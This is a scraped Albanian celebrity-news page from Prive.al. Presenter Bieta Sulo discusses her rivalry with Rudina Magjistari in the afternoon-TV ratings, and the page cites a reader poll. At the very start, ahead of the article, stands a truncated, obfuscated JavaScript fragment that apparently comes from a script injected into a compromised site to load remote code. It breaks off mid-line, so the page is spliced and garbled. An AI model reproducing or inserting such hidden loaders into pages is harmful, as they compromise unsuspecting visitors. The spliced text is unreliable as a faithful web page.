;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Bieta foli për Rudinën me të qeshur e të ngjeshur!

By

Bieta Sulo, fytyra më e re e pasditeve të shqiptarëve ishtë këtë herë e ftuar në emisionin ‘Thumb’ të Aulonës dhe Fatmës.

Ajo foli për shumë detaje nga jeta dhe karriera. Pashmangshëm, ajo do pyetej edhe për konkurencën, Rudina Magjistari.

Prezantuesja e ‘Ftesë në 5’ që garon direkt në format dhe orar me Rudina Magjistarin pati një përgjigjje tejet të kujdesshme për rivalen.

Bieta, e ‘qëndisi’ përgjigjjen në atë mënyrë që të tregohet e kujdesshme por duke mos i lënë anash disa kunja.

Ajo, suksesin e Rudinës pasditeve ia atriboi dy faktorëve; ndërrimit të shpeshtë të autorëve dhe prezantueseve të formatit të njejtë në Top dhe mungesës së përballjes së drejtpërdrejtë (dikur, Pasditja e Topit niste kur mbaronte ajo e Klanit).

‘Rudina nuk e ka ngrënë bukën kot gjithë këto vite. Unë them që ajo nuk e ka ngrënë bukën kot por edhe nga televizoni, hapësira është lënë bosh. Mendoj që të dyja këto tani do duhet të rregullohen’ – u shpreh Bieta me një të qeshur të lehtë.

Tutje, prezantuesja tha se përcjell ndjekësit e audiencës por nuk u lëshua në rezultatet e para në këto dy muaj transmetim.

Një sondazh i pak ditëve më parë në Prive.al, nxori Rudinën fituese në përballje me moderatoren simpatike. Nga 1000  votues, 67% zgjodhën pasditen e Klanit teksa pjesa tjetër atë të Topit. Sidoqoftë, TCH s’ka qenë ndonjëherë në rrugë më të mirë për ta rivalizuar konkurencën se tani…. /Prive.al

Artikuj të ngjashëm